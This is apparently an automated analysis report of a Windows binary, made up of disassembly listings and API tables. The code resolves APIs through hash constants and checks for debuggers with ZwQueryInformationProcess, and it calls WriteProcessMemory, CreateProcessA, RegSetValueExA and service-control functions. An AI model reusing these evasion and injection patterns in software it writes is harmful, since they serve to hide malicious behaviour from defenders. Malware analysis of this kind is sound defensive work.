00402108 call 00401A08h
0040210D test al, al
0040210F je 00402119h
00402111 cmp ebx, 7FFFFFF8h xrefs 00402106
00402117 jle 00402123h
00402119 xor eax, eax xrefs 0040210F
0040211B mov dword ptr [ebp-04h], eax
0040211E jmp 00402277h
00402123 xor ecx, ecx xrefs 00402117
00402125 push ebp
00402126 push 00402270h
0040212B push dword ptr fs:[ecx]
0040212E mov dword ptr fs:[ecx], esp
00402131 cmp byte ptr [0042C045h], 00000000h
00402138 je 00402144h
0040213A push 0042C5C4h
0040213F call 00401364h
00402144 add ebx, 07h xrefs 00402138
00402147 and ebx, FFFFFFFCh
0040214A cmp ebx, 0Ch
0040214D jnl 00402154h
0040214F mov ebx, 0000000Ch
00402154 cmp ebx, 00001000h xrefs 0040214D
0040215A jg 004021F3h
00402160 mov eax, ebx
00402162 test eax, eax
00402164 jns 00402169h
00402166 add eax, 03h
00402169 sar eax, 02h xrefs 00402164
0040216C mov edx, dword ptr [0042C61Ch] 00000000
00402172 mov edx, dword ptr [edx+eax*4-0Ch]
00402176 test edx, edx
00402178 je 004021F3h
0040217A mov esi, edx
0040217C mov eax, esi
0040217E add eax, ebx
00402180 and dword ptr [eax], FFFFFFFEh
00402183 mov eax, dword ptr [edx+04h]
00402186 cmp edx, eax
00402188 jne 004021A4h
0040218A mov eax, ebx
0040218C test eax, eax
0040218E jns 00402193h
00402190 add eax, 03h
00402193 sar eax, 02h xrefs 0040218E
00402196 mov ecx, dword ptr [0042C61Ch] 00000000
0040219C xor edi, edi
0040219E mov dword ptr [ecx+eax*4-0Ch], edi
004021A2 jmp 004021CAh
004021A4 mov ecx, ebx xrefs 00402188
004021A6 test ecx, ecx
004021A8 jns 004021ADh
004021AA add ecx, 03h
004021AD sar ecx, 02h xrefs 004021A8
004021B0 mov edi, dword ptr [0042C61Ch] 00000000
004021B6 mov dword ptr [edi+ecx*4-0Ch], eax
004021BA mov ecx, dword ptr [edx]
004021BC mov dword ptr [ebp-08h], ecx
004021BF mov ecx, dword ptr [ebp-08h]
004021C2 mov dword ptr [ecx+04h], eax
004021C5 mov ecx, dword ptr [ebp-08h]
004021C8 mov dword ptr [eax], ecx
004021CA mov eax, esi xrefs 004021A2
004021CC mov edx, dword ptr [edx+08h]
004021CF or edx, 02h
004021D2 mov dword ptr [eax], edx
004021D4 add eax, 04h
004021D7 mov dword ptr [ebp-04h], eax
004021DA inc dword ptr [0042C5ACh]
004021E0 sub ebx, 04h
004021E3 add dword ptr [0042C5B0h], ebx
004021E9 call 00403E64h
004021EE jmp 00402277h
004021F3 cmp ebx, dword ptr [0042C614h] 000020B4 xrefs 0040215A, 00402178
004021F9 jnle 00402245h
004021FB sub dword ptr [0042C614h], ebx
00402201 cmp dword ptr [0042C614h], 0Ch
00402208 jnl 00402217h
0040220A add ebx, dword ptr [0042C614h]
00402210 xor eax, eax
00402212 mov dword ptr [0042C614h], eax
00402217 mov eax, dword ptr [0042C618h] 00961F48 xrefs 00402208
0040221C add dword ptr [0042C618h], ebx
00402222 mov edx, ebx
00402224 or edx, 02h
00402227 mov dword ptr [eax], edx
00402229 add eax, 04h
0040222C mov dword ptr [ebp-04h], eax
0040222F inc dword ptr [0042C5ACh]
00402235 sub ebx, 04h
00402238 add dword ptr [0042C5B0h], ebx
0040223E call 00403E64h
00402243 jmp 00402277h
00402245 mov eax, ebx xrefs 004021F9
00402247 call 00402000h
0040224C mov dword ptr [ebp-04h], eax
0040224F xor eax, eax
00402251 pop edx
00402253 pop ecx Count = 2
00402254 mov dword ptr fs:[eax], edx
00402257 push 00402277h
0040225C cmp byte ptr [0042C045h], 00000000h xrefs 00402275
00402263 je 0040226Fh
00402265 push 0042C5C4h
0040226A call 0040136Ch
0040226F ret xrefs 00402263 function end
00402277 mov eax, dword ptr [ebp-04h] xrefs 00402243, 004021EE, 0040211E
0040227A pop edi
0040227B pop esi
0040227C pop ebx
0040227E pop ecx Count = 2
0040227F pop ebp
00402280 ret function end
APIs
  • 77124CFD.OLEAUT32, ref: 0040DD6D
Address Instruction Meta Information
0040DBB4 push ebp xrefs 0040DDFD
0040DBB5 mov ebp, esp
0040DBB7 add esp, FFFFFCE0h
0040DBBD push ebx
0040DBBE push esi
0040DBBF push edi
0040DBC0 mov dword ptr [ebp-00000308h], ecx
0040DBC6 mov ebx, edx
0040DBC8 mov dword ptr [ebp-00000304h], eax
0040DBCE test byte ptr [ebx+01h], 00000020h
0040DBD2 jne 0040DBDEh
0040DBD4 mov eax, 80070057h
0040DBD9 call 0040D7F4h
0040DBDE mov ax, word ptr [ebx] xrefs 0040DBD2
0040DBE1 mov edx, eax
0040DBE3 and dx, 0FFFh
0040DBE8 cmp dx, 000Ch
0040DBEC jne 0040DD65h
0040DBF2 test ah, 00000040h
0040DBF5 je 0040DC04h
0040DBF7 mov eax, dword ptr [ebx+08h]
0040DBFA mov eax, dword ptr [eax]
0040DBFC mov dword ptr [ebp-00000314h], eax
0040DC02 jmp 0040DC0Dh
0040DC04 mov eax, dword ptr [ebx+08h] xrefs 0040DBF5
0040DC07 mov dword ptr [ebp-00000314h], eax
0040DC0D mov eax, dword ptr [ebp-00000314h] xrefs 0040DC02
0040DC13 movzx eax, word ptr [eax]
0040DC16 mov dword ptr [ebp-00000310h], eax
0040DC1C mov ebx, dword ptr [ebp-00000310h]
0040DC22 dec ebx
0040DC23 test ebx, ebx
0040DC25 jl 0040DC92h
0040DC27 inc ebx
0040DC28 xor edi, edi
0040DC2A lea esi, dword ptr [ebp-00000300h]
0040DC30 mov eax, esi xrefs 0040DC90
0040DC32 mov dword ptr [ebp-00000320h], eax
0040DC38 mov eax, dword ptr [ebp-00000320h]
0040DC3E add eax, 04h
0040DC41 push eax
0040DC42 lea eax, dword ptr [edi+01h]
0040DC45 push eax
0040DC46 mov eax, dword ptr [ebp-00000314h]
0040DC4C push eax
0040DC4D call 0040CA04h
0040DC52 call 0040D7F4h
0040DC57 lea eax, dword ptr [ebp-0000030Ch]
0040DC5D push eax
0040DC5E lea eax, dword ptr [edi+01h]
0040DC61 push eax
0040DC62 mov eax, dword ptr [ebp-00000314h]
0040DC68 push eax
0040DC69 call 0040CA0Ch
0040DC6E call 0040D7F4h
0040DC73 mov eax, dword ptr [ebp-00000320h]
0040DC79 mov edx, dword ptr [ebp-0000030Ch]
0040DC7F sub edx, dword ptr [eax+04h]
0040DC82 inc edx
0040DC83 mov eax, dword ptr [ebp-00000320h]
0040DC89 mov dword ptr [eax], edx
0040DC8B inc edi
0040DC8C add esi, 08h
0040DC8F dec ebx
0040DC90 jne 0040DC30h
0040DC92 lea eax, dword ptr [ebp-00000300h] xrefs 0040DC25
0040DC98 push eax
0040DC99 mov eax, dword ptr [ebp-00000310h]
0040DC9F push eax
0040DCA0 push 0000000Ch
0040DCA2 call 0040C9FCh
0040DCA7 mov esi, eax
0040DCA9 test esi, esi
0040DCAB jne 0040DCB2h
0040DCAD call 0040D54Ch
0040DCB2 mov eax, dword ptr [ebp-00000304h] xrefs 0040DCAB
0040DCB8 call 0040DB0Ch
0040DCBD mov eax, dword ptr [ebp-00000304h]
0040DCC3 mov word ptr [eax], 200Ch
0040DCC8 mov eax, dword ptr [ebp-00000304h]
0040DCCE mov dword ptr [eax+08h], esi
0040DCD1 mov ebx, dword ptr [ebp-00000310h]
0040DCD7 dec ebx
0040DCD8 test ebx, ebx
0040DCDA jl 0040DCF6h
0040DCDC inc ebx
0040DCDD lea eax, dword ptr [ebp-000002FCh]
0040DCE3 lea edx, dword ptr [ebp-00000100h]
0040DCE9 mov ecx, dword ptr [eax] xrefs 0040DCF4
0040DCEB mov dword ptr [edx], ecx
0040DCED add edx, 04h
0040DCF0 add eax, 08h
0040DCF3 dec ebx
0040DCF4 jne 0040DCE9h
0040DCF6 push ebp xrefs 0040DCDA, 0040DD61
0040DCF7 mov ebx, dword ptr [ebp-00000310h]
0040DCFD dec ebx
0040DCFE mov eax, ebx
0040DD00 call 0040DB28h
0040DD05 pop ecx
0040DD06 test al, al
0040DD08 je 0040DD56h
0040DD0A lea eax, dword ptr [ebp-00000318h]
0040DD10 push eax
0040DD11 lea eax, dword ptr [ebp-00000100h]
0040DD17 push eax
0040DD18 mov eax, dword ptr [ebp-00000314h]
0040DD1E push eax
0040DD1F call 0040CA14h
0040DD24 call 0040D7F4h
0040DD29 lea eax, dword ptr [ebp-0000031Ch]
0040DD2F push eax
0040DD30 lea eax, dword ptr [ebp-00000100h]
0040DD36 push eax
0040DD37 push esi
0040DD38 call 0040CA14h
0040DD3D call 0040D7F4h
0040DD42 mov eax, dword ptr [ebp-00000318h]
0040DD48 mov edx, eax
0040DD4A mov eax, dword ptr [ebp-0000031Ch]
0040DD50 call dword ptr [ebp-00000308h]
0040DD56 push ebp xrefs 0040DD08
0040DD57 mov eax, ebx
0040DD59 call 0040DB58h
0040DD5E pop ecx
0040DD5F test al, al
0040DD61 jne 0040DCF6h
0040DD63 jmp 0040DD77h
0040DD65 push ebx xrefs 0040DBEC
0040DD66 mov eax, dword ptr [ebp-00000304h]
0040DD6C push eax
0040DD6D call 0040C5A8h 77124CFD@OLEAUT32.DLL (Import)
0040DD72 call 0040D7F4h
0040DD77 pop edi xrefs 0040DD63
0040DD78 pop esi
0040DD79 pop ebx
0040DD7A mov esp, ebp
0040DD7C pop ebp
0040DD7D ret function end
APIs
  • getprotobynumber.WS2_32, ref: 00414363
  • getservbyname.WS2_32, ref: 0041437D
  • htons.WS2_32, ref: 0041439C
  • getaddrinfo.WS2_32, ref: 0041440F
  • htons.WS2_32, ref: 00414433
  • htons.WS2_32, ref: 00414451
  • FreeAddrInfoW.WS2_32, ref: 00414472
Address Instruction Meta Information
00414314 push ebp xrefs 0041993D
00414315 mov ebp, esp
00414317 add esp, FFFFFFD4h
0041431A push ebx
0041431B push esi
0041431C mov ebx, ecx
0041431E mov esi, edx
00414320 mov dword ptr [ebp-04h], eax
00414323 mov eax, dword ptr [ebp-04h]
00414326 call 00404868h
0041432B xor eax, eax
0041432D push ebp
0041432E push 00414496h
00414333 push dword ptr fs:[eax]
00414336 mov dword ptr fs:[eax], esp
00414339 mov word ptr [ebp-06h], 0000h
0041433F mov eax, esi
00414341 call 00413B74h
00414346 test al, al
00414348 jne 004143C5h
0041434A mov eax, dword ptr [0042C8A4h] 00960A4C
0041434F call 00413914h
00414354 xor edx, edx
00414356 push ebp
00414357 push 004143BEh
0041435C push dword ptr fs:[edx]
0041435F mov dword ptr fs:[edx], esp
00414362 push ebx
00414363 call dword ptr [0042B3E0h] getprotobynumber@WS2_32.DLL (Hidden Import)
00414369 mov ebx, eax
0041436B xor eax, eax
0041436D test ebx, ebx
0041436F je 00414383h
00414371 mov eax, dword ptr [ebx]
00414373 push eax
00414374 mov eax, dword ptr [ebp-04h]
00414377 call 00404878h
0041437C push eax
0041437D call dword ptr [0042B3D4h] getservbyname@WS2_32.DLL (Hidden Import)
00414383 test eax, eax xrefs 0041436F
00414385 jne 00414397h
00414387 xor edx, edx
00414389 mov eax, dword ptr [ebp-04h]
0041438C call 00407608h
00414391 mov word ptr [ebp-06h], ax
00414395 jmp 004143A6h
00414397 mov ax, word ptr [eax+08h] xrefs 00414385
0041439B push eax
0041439C call dword ptr [0042B424h] htons@WS2_32.DLL (Hidden Import)
004143A2 mov word ptr [ebp-06h], ax
004143A6 xor eax, eax xrefs 00414395
004143A8 pop edx
004143AA pop ecx Count = 2
004143AB mov dword ptr fs:[eax], edx
004143AE push 00414480h
004143B3 mov eax, dword ptr [0042C8A4h] 00960A4C xrefs 004143C3
004143B8 call 0041391Ch
004143BD ret function end
004143C5 xor eax, eax xrefs 00414348
004143C7 mov dword ptr [ebp-0Ch], eax
004143CA xor edx, edx
004143CC push ebp
004143CD push 00414479h
004143D2 push dword ptr fs:[edx]
004143D5 mov dword ptr fs:[edx], esp
004143D8 lea eax, dword ptr [ebp-2Ch]
004143DB xor ecx, ecx
004143DD mov edx, 00000020h
004143E2 call 00403030h
004143E7 xor eax, eax
004143E9 mov dword ptr [ebp-28h], eax
004143EC mov eax, dword ptr [ebp+08h]
004143EF mov dword ptr [ebp-24h], eax
004143F2 mov dword ptr [ebp-20h], ebx
004143F5 mov dword ptr [ebp-2Ch], 00000001h
004143FC lea eax, dword ptr [ebp-0Ch]
004143FF push eax
00414400 lea eax, dword ptr [ebp-2Ch]
00414403 push eax
00414404 mov eax, dword ptr [ebp-04h]
00414407 call 00404878h
0041440C push eax
0041440D push 00000000h
0041440F call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
00414415 test eax, eax
00414417 jne 0041445Bh
00414419 cmp dword ptr [ebp-0Ch], 00000000h
0041441D je 0041445Bh
0041441F mov eax, dword ptr [ebp-0Ch]
00414422 cmp dword ptr [eax+04h], 02h
00414426 jne 0041443Dh
00414428 mov eax, dword ptr [ebp-0Ch]
0041442B mov eax, dword ptr [eax+18h]
0041442E mov ax, word ptr [eax+02h]
00414432 push eax
00414433 call dword ptr [0042B424h] htons@WS2_32.DLL (Hidden Import)
00414439 mov word ptr [ebp-06h], ax
0041443D mov eax, dword ptr [ebp-0Ch] xrefs 00414426
00414440 cmp dword ptr [eax+04h], 17h
00414444 jne 0041445Bh
00414446 mov eax, dword ptr [ebp-0Ch]
00414449 mov eax, dword ptr [eax+18h]
0041444C mov ax, word ptr [eax+02h]
00414450 push eax
00414451 call dword ptr [0042B424h] htons@WS2_32.DLL (Hidden Import)
00414457 mov word ptr [ebp-06h], ax
0041445B xor eax, eax xrefs 00414417, 0041441D, 00414444
0041445D pop edx
0041445F pop ecx Count = 2
00414460 mov dword ptr fs:[eax], edx
00414463 push 00414480h
00414468 cmp dword ptr [ebp-0Ch], 00000000h xrefs 0041447E
0041446C je 00414478h
0041446E mov eax, dword ptr [ebp-0Ch]
00414471 push eax
00414472 call dword ptr [0042B450h] FreeAddrInfoW@WS2_32.DLL (Hidden Import)
00414478 ret xrefs 0041446C function end
APIs
  • GetThreadLocale.KERNEL32, ref: 00408DEC
  • GetDateFormatA.KERNEL32, ref: 00408DF2
Address Instruction Meta Information
00408D74 push ebp xrefs 004091A8
00408D75 mov ebp, esp
00408D77 add esp, FFFFFEE8h
00408D7D push ebx
00408D7E push esi
00408D7F xor ecx, ecx
00408D81 mov dword ptr [ebp-00000118h], ecx
00408D87 mov dword ptr [ebp-04h], ecx
00408D8A mov ebx, edx
00408D8C mov esi, eax
00408D8E xor eax, eax
00408D90 push ebp
00408D91 push 00408EC2h
00408D96 push dword ptr fs:[eax]
00408D99 mov dword ptr fs:[eax], esp
00408D9C mov eax, ebx
00408D9E call 004043DCh
00408DA3 mov eax, dword ptr [ebp+08h]
00408DA6 mov ax, word ptr [eax-0Eh]
00408DAA mov word ptr [ebp-14h], ax
00408DAE mov eax, dword ptr [ebp+08h]
00408DB1 mov ax, word ptr [eax-10h]
00408DB5 mov word ptr [ebp-12h], ax
00408DB9 mov eax, dword ptr [ebp+08h]
00408DBC mov ax, word ptr [eax-12h]
00408DC0 mov word ptr [ebp-0Eh], ax
00408DC4 lea eax, dword ptr [ebp-04h]
00408DC7 mov edx, 00408ED8h
00408DCC call 00404474h
00408DD1 push 00000100h
00408DD6 lea eax, dword ptr [ebp-00000114h]
00408DDC push eax
00408DDD mov eax, dword ptr [ebp-04h]
00408DE0 call 00404878h
00408DE5 push eax
00408DE6 lea eax, dword ptr [ebp-14h]
00408DE9 push eax
00408DEA push 00000004h
00408DEC call 004061ECh GetThreadLocale@KERNEL32.DLL (Hidden Import)
00408DF1 push eax
00408DF2 call 0040618Ch GetDateFormatA@KERNEL32.DLL (Hidden Import)
00408DF7 test eax, eax
00408DF9 je 00408EA1h
00408DFF mov eax, ebx
00408E01 lea edx, dword ptr [ebp-00000114h]
00408E07 mov ecx, 00000100h
00408E0C call 0040464Ch
00408E11 dec esi
00408E12 jne 00408EA1h
00408E18 mov eax, dword ptr [0042C73Ch] 00000009
00408E1D sub eax, 04h
00408E20 je 00408E44h
00408E22 sub eax, 0Dh
00408E25 jne 00408EA1h
00408E27 push ebx
00408E28 mov eax, dword ptr [ebx]
00408E2A mov edx, 00000001h
00408E2F call 0040B320h
00408E34 mov ecx, eax
00408E36 mov eax, dword ptr [ebx]
00408E38 mov edx, 00000001h
00408E3D call 004048D8h
00408E42 jmp 00408EA1h
00408E44 cmp dword ptr [0042C740h], 01h xrefs 00408E20
00408E4B jne 00408EA1h
00408E4D mov eax, dword ptr [ebx]
00408E4F call 00404678h
00408E54 mov edx, eax
00408E56 mov eax, dword ptr [ebx]
00408E58 call 0040B1ACh
00408E5D cmp eax, 04h
00408E60 jne 00408EA1h
00408E62 mov eax, dword ptr [ebx]
00408E64 mov edx, 00000003h
00408E69 call 0040B2BCh
00408E6E mov esi, eax
00408E70 lea eax, dword ptr [ebp-00000114h]
00408E76 add esi, eax
00408E78 dec esi
00408E79 lea eax, dword ptr [ebp-00000118h]
00408E7F mov edx, esi
00408E81 call 004045D4h
00408E86 mov eax, dword ptr [ebp-00000118h]
00408E8C mov edx, 00000002h
00408E91 call 0040B320h
00408E96 mov ecx, eax
00408E98 mov eax, ebx
00408E9A mov edx, esi
00408E9C call 004044CCh
00408EA1 xor eax, eax xrefs 00408DF9, 00408E12, 00408E4B, 00408E60, 00408E25, 00408E42
00408EA3 pop edx
00408EA5 pop ecx Count = 2
00408EA6 mov dword ptr fs:[eax], edx
00408EA9 push 00408EC9h
00408EAE lea eax, dword ptr [ebp-00000118h] xrefs 00408EC7
00408EB4 call 004043DCh
00408EB9 lea eax, dword ptr [ebp-04h]
00408EBC call 004043DCh
00408EC1 ret function end
APIs
  • RegisterServiceCtrlHandlerA.ADVAPI32, ref: 00429A4C
  • SetServiceStatus.ADVAPI32, ref: 00429A6E
  • CreateThread.KERNEL32, ref: 00429A89
  • WaitForSingleObject.KERNEL32, ref: 00429A9B
  • CloseHandle.KERNEL32, ref: 00429AA6
Address Instruction Meta Information
00429A0C push ebp
00429A0D mov ebp, esp
00429A0F push ecx
00429A10 push ebx
00429A11 mov ebx, 0042CAA4h
00429A16 mov dword ptr [ebx], 00000030h
00429A1C mov dword ptr [ebx+04h], 00000002h
00429A23 xor eax, eax
00429A25 mov dword ptr [ebx+08h], eax
00429A28 xor eax, eax
00429A2A mov dword ptr [ebx+0Ch], eax
00429A2D xor eax, eax
00429A2F mov dword ptr [ebx+10h], eax
00429A32 xor eax, eax
00429A34 mov dword ptr [ebx+14h], eax
00429A37 xor eax, eax
00429A39 mov dword ptr [ebx+18h], eax
00429A3C push 004299F0h
00429A41 mov eax, dword ptr [0042DA9Ch] 00000000
00429A46 call 00404878h
00429A4B push eax
00429A4C call 00421BBCh RegisterServiceCtrlHandlerA@ADVAPI32.DLL (Hidden Import)
00429A51 mov dword ptr [0042CAC0h], eax
00429A56 mov dword ptr [ebx+04h], 00000004h
00429A5D xor eax, eax
00429A5F mov dword ptr [ebx+14h], eax
00429A62 xor eax, eax
00429A64 mov dword ptr [ebx+18h], eax
00429A67 push ebx
00429A68 mov eax, dword ptr [0042CAC0h] 00000000
00429A6D push eax
00429A6E call 00421BB4h SetServiceStatus@ADVAPI32.DLL (Hidden Import)
00429A73 call 00422504h
00429A78 lea eax, dword ptr [ebp-04h]
00429A7B push eax
00429A7E push 00000000h Count = 2
00429A80 push 00429A04h
00429A87 push 00000000h Count = 2
00429A89 call 00421B8Ch CreateThread@KERNEL32.DLL (Hidden Import)
00429A8E mov dword ptr [0042CAA0h], eax
00429A93 push FFFFFFFFh
00429A95 mov eax, dword ptr [0042CAA0h] 00000000
00429A9A push eax
00429A9B call 00421B9Ch WaitForSingleObject@KERNEL32.DLL (Hidden Import)
00429AA0 mov eax, dword ptr [0042CAA0h] 00000000
00429AA5 push eax
00429AA6 call 00421BA4h CloseHandle@KERNEL32.DLL (Hidden Import)
00429AAB pop ebx
00429AAC pop ecx
00429AAD pop ebp
00429AAE retn 000Ch function end
Executed Functions
APIs
  • DeleteFileA.KERNEL32, ref: 0041609F
Address Instruction Meta Information
0041609B push dword ptr [esp+04h] xrefs 004155FD, 004154BA
0041609F call dword ptr [0040102Ch] DeleteFileA@KERNEL32.DLL (Import)
004160A5 neg eax
004160A7 sbb eax, eax
004160A9 inc eax
004160AA ret function end
APIs
  • SwitchToThread.KERNEL32, ref: 00415E55
  • GetDriveTypeA.KERNEL32, ref: 00414286
Address Instruction Meta Information
00414270 push ebp xrefs 00415409, 00415500, 00415646, 00413EFE
00414271 mov ebp, esp
00414273 mov eax, dword ptr [ebp+08h]
00414276 push eax
00414277 push 6B5366BEh
0041427C push 399354CEh
00414281 call 00415E40h
00414286 call eax GetDriveTypeA@KERNEL32.DLL (Hidden Import)
00414288 pop ebp
00414289 retn 0004h function end
Strings
  • ntdll.dll, va: 0041215C
  • ZwQueryInformationProcess, va: 00412168
Address Instruction Meta Information
00412190 push ebp xrefs 00414897
00412191 mov ebp, esp
00412193 sub esp, 14h
00412196 mov dword ptr [ebp-08h], 00000000h
0041219D lea eax, dword ptr [ebp-08h]
004121A0 push eax
004121A1 push FFFFFFFFh
004121A3 call 00412250h
004121A8 cmp dword ptr [ebp-08h], 00000000h
004121AC je 004121B5h
004121AE mov al, 01h
004121B0 jmp 00412246h
004121B5 push 0041215Ch ASCII "ntdll.dll" xrefs 004121AC
004121BA call 00412270h
004121BF mov dword ptr [ebp-10h], eax
004121C2 cmp dword ptr [ebp-10h], 00000000h
004121C6 jne 004121CCh
004121C8 mov al, 01h
004121CA jmp 00412246h
004121CC push 00412168h ASCII "ZwQueryInformationProcess" xrefs 004121C6
004121D1 mov ecx, dword ptr [ebp-10h]
004121D4 push ecx
004121D5 call 00412290h
004121DA mov dword ptr [ebp-04h], eax
004121DD cmp dword ptr [ebp-04h], 00000000h
004121E1 jne 004121E7h
004121E3 mov al, 01h
004121E5 jmp 00412246h
004121E7 mov dword ptr [ebp-0Ch], 00000000h xrefs 004121E1
004121EE mov dword ptr [ebp-14h], 00000001h
004121F5 push 00000000h
004121F7 push 00000004h
004121F9 lea edx, dword ptr [ebp-0Ch]
004121FC push edx
004121FD push 00000007h
004121FF push FFFFFFFFh
00412201 call dword ptr [ebp-04h]
00412204 test eax, eax
00412206 jl 00412212h
00412208 cmp dword ptr [ebp-0Ch], 00000000h
0041220C je 00412212h
0041220E mov al, 01h
00412210 jmp 00412246h
00412212 push 00000000h xrefs 00412206, 0041220C
00412214 push 00000004h
00412216 lea eax, dword ptr [ebp-0Ch]
00412219 push eax
0041221A push 0000001Eh
0041221C push FFFFFFFFh
0041221E call dword ptr [ebp-04h]
00412221 test eax, eax
00412223 jne 00412229h
00412225 mov al, 01h
00412227 jmp 00412246h
00412229 push 00000000h xrefs 00412223
0041222B push 00000004h
0041222D lea ecx, dword ptr [ebp-14h]
00412230 push ecx
00412231 push 0000001Fh
00412233 push FFFFFFFFh
00412235 call dword ptr [ebp-04h]
00412238 test eax, eax
0041223A jl 00412246h
0041223C mov edx, dword ptr [ebp-14h]
0041223F and edx, 01h
00412242 jne 00412246h
00412244 mov al, 01h
00412246 mov esp, ebp xrefs 0041223A, 00412242, 00412227, 00412210, 004121E5, 004121CA, 004121B0
00412248 pop ebp
00412249 ret function end
APIs
  • SwitchToThread.KERNEL32, ref: 00415E55
  • RegSetValueExA.ADVAPI32, ref: 00414A9A
Address Instruction Meta Information
00414A70 push ebp xrefs 004147BE
00414A71 mov ebp, esp
00414A73 mov eax, dword ptr [ebp+1Ch]
00414A76 push eax
00414A77 mov ecx, dword ptr [ebp+18h]
00414A7A push ecx
00414A7B mov edx, dword ptr [ebp+14h]
00414A7E push edx
00414A7F mov eax, dword ptr [ebp+10h]
00414A82 push eax
00414A83 mov ecx, dword ptr [ebp+0Ch]
00414A86 push ecx
00414A87 mov edx, dword ptr [ebp+08h]
00414A8A push edx
00414A8B push 647832FCh
00414A90 push 3E400FD6h
00414A95 call 00415E40h
00414A9A call eax RegSetValueExA@ADVAPI32.DLL (Hidden Import)
00414A9C pop ebp
00414A9D retn 0018h function end
APIs
  • WriteFile.KERNEL32, ref: 004162D0
Address Instruction Meta Information
004162AF push ebp xrefs 004160EC
004162B0 mov ebp, esp
004162B2 mov eax, dword ptr [ebp+08h]
004162B5 push esi
004162B6 xor ecx, ecx
004162B8 xor esi, esi
004162BA cmp byte ptr [eax], cl
004162BC je 004162C4h
004162BE inc esi xrefs 004162C2
004162BF cmp byte ptr [esi+eax], cl
004162C2 jne 004162BEh
004162C4 push ecx xrefs 004162BC
004162C5 lea ecx, dword ptr [ebp+08h]
004162C8 push ecx
004162C9 push esi
004162CA push eax
004162CB mov eax, dword ptr [ebp+0Ch]
004162CE push dword ptr [eax]
004162D0 call dword ptr [0040100Ch] WriteFile@KERNEL32.DLL (Import)
004162D6 test eax, eax
004162D8 jne 004162DFh
004162DA or eax, FFFFFFFFh
004162DD jmp 004162E9h
004162DF mov eax, dword ptr [ebp+08h] xrefs 004162D8
004162E2 cmp eax, esi
004162E4 je 004162E9h
004162E6 or eax, FFFFFFFFh
004162E9 pop esi xrefs 004162E4, 004162DD
004162EA pop ebp
004162EB ret function end
APIs
  • SwitchToThread.KERNEL32, ref: 00415E55
  • WriteProcessMemory.KERNEL32, ref: 00414546
Address Instruction Meta Information
00414520 push ebp xrefs 00414343, 004143EB, 004143B4, 004152C8, 004152E6
00414521 mov ebp, esp
00414523 mov eax, dword ptr [ebp+18h]
00414526 push eax
00414527 mov ecx, dword ptr [ebp+14h]
0041452A push ecx
0041452B mov edx, dword ptr [ebp+10h]
0041452E push edx
0041452F mov eax, dword ptr [ebp+0Ch]
00414532 push eax
00414533 mov ecx, dword ptr [ebp+08h]
00414536 push ecx
00414537 push 6B5366BEh
0041453C push BEA0BF35h
00414541 call 00415E40h
00414546 call eax WriteProcessMemory@KERNEL32.DLL (Hidden Import)
00414548 pop ebp
00414549 retn 0014h function end
APIs
  • SwitchToThread.KERNEL32, ref: 00415E55
  • FindNextFileA.KERNEL32, ref: 004141FA
Address Instruction Meta Information
004141E0 push ebp xrefs 0041468B, 00413EB4
004141E1 mov ebp, esp
004141E3 mov eax, dword ptr [ebp+0Ch]
004141E6 push eax
004141E7 mov ecx, dword ptr [ebp+08h]
004141EA push ecx
004141EB push 6B5366BEh
004141F0 push 279DEAD7h
004141F5 call 00415E40h
004141FA call eax FindNextFileA@KERNEL32.DLL (Hidden Import)
004141FC pop ebp
004141FD retn 0008h function end
APIs
  • SwitchToThread.KERNEL32, ref: 00415E55
  • FindFirstFileA.KERNEL32, ref: 0041410A
Address Instruction Meta Information
004140F0 push ebp xrefs 0041465F, 00413D6C
004140F1 mov ebp, esp
004140F3 mov eax, dword ptr [ebp+0Ch]
004140F6 push eax
004140F7 mov ecx, dword ptr [ebp+08h]
004140FA push ecx
004140FB push 6B5366BEh
00414100 push 32432444h
00414105 call 00415E40h
0041410A call eax FindFirstFileA@KERNEL32.DLL (Hidden Import)
0041410C pop ebp
0041410D retn 0008h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CreateThread.KERNEL32, ref: 00414B7A
Address Instruction Meta Information
00414B50 push ebp xrefs 00414982, 00414996, 0041495A
00414B51 mov ebp, esp
00414B53 mov eax, dword ptr [ebp+1Ch]
00414B56 push eax
00414B57 mov ecx, dword ptr [ebp+18h]
00414B5A push ecx
00414B5B mov edx, dword ptr [ebp+14h]
00414B5E push edx
00414B5F mov eax, dword ptr [ebp+10h]
00414B62 push eax
00414B63 mov ecx, dword ptr [ebp+0Ch]
00414B66 push ecx
00414B67 mov edx, dword ptr [ebp+08h]
00414B6A push edx
00414B6B push 6B5366BEh
00414B70 push 6FB89AF0h
00414B75 call 00415E40h
00414B7A call eax CreateThread@KERNEL32.DLL (Hidden Import)
00414B7C pop ebp
00414B7D retn 0018h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CreateProcessA.KERNEL32, ref: 004144EA
Address Instruction Meta Information
004144B0 push ebp xrefs 00414300, 0041516E
004144B1 mov ebp, esp
004144B3 mov eax, dword ptr [ebp+2Ch]
004144B6 push eax
004144B7 mov ecx, dword ptr [ebp+28h]
004144BA push ecx
004144BB mov edx, dword ptr [ebp+24h]
004144BE push edx
004144BF mov eax, dword ptr [ebp+20h]
004144C2 push eax
004144C3 mov ecx, dword ptr [ebp+1Ch]
004144C6 push ecx
004144C7 mov edx, dword ptr [ebp+18h]
004144CA push edx
004144CB mov eax, dword ptr [ebp+14h]
004144CE push eax
004144CF mov ecx, dword ptr [ebp+10h]
004144D2 push ecx
004144D3 mov edx, dword ptr [ebp+0Ch]
004144D6 push edx
004144D7 mov eax, dword ptr [ebp+08h]
004144DA push eax
004144DB push 6B5366BEh
004144E0 push 46318AC7h
004144E5 call 00415E40h
004144EA call eax CreateProcessA@KERNEL32.DLL (Hidden Import)
004144EC pop ebp
004144ED retn 0028h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • WriteFile.KERNEL32, ref: 00414016
Address Instruction Meta Information
00413FF0 push ebp xrefs 00414763, 00413CAA, 00413CCB, 00413CEE, 00413D0C, 00413A97
00413FF1 mov ebp, esp
00413FF3 mov eax, dword ptr [ebp+18h]
00413FF6 push eax
00413FF7 mov ecx, dword ptr [ebp+14h]
00413FFA push ecx
00413FFB mov edx, dword ptr [ebp+10h]
00413FFE push edx
00413FFF mov eax, dword ptr [ebp+0Ch]
00414002 push eax
00414003 mov ecx, dword ptr [ebp+08h]
00414006 push ecx
00414007 push 6B5366BEh
0041400C push 0F3FD1C3h
00414011 call 00415E40h
00414016 call eax WriteFile@KERNEL32.DLL (Import)
00414018 pop ebp
00414019 retn 0014h function end
APIs
    • HeapAlloc.KERNEL32, ref: 00415FFE
    • HeapFree.KERNEL32, ref: 004162F8
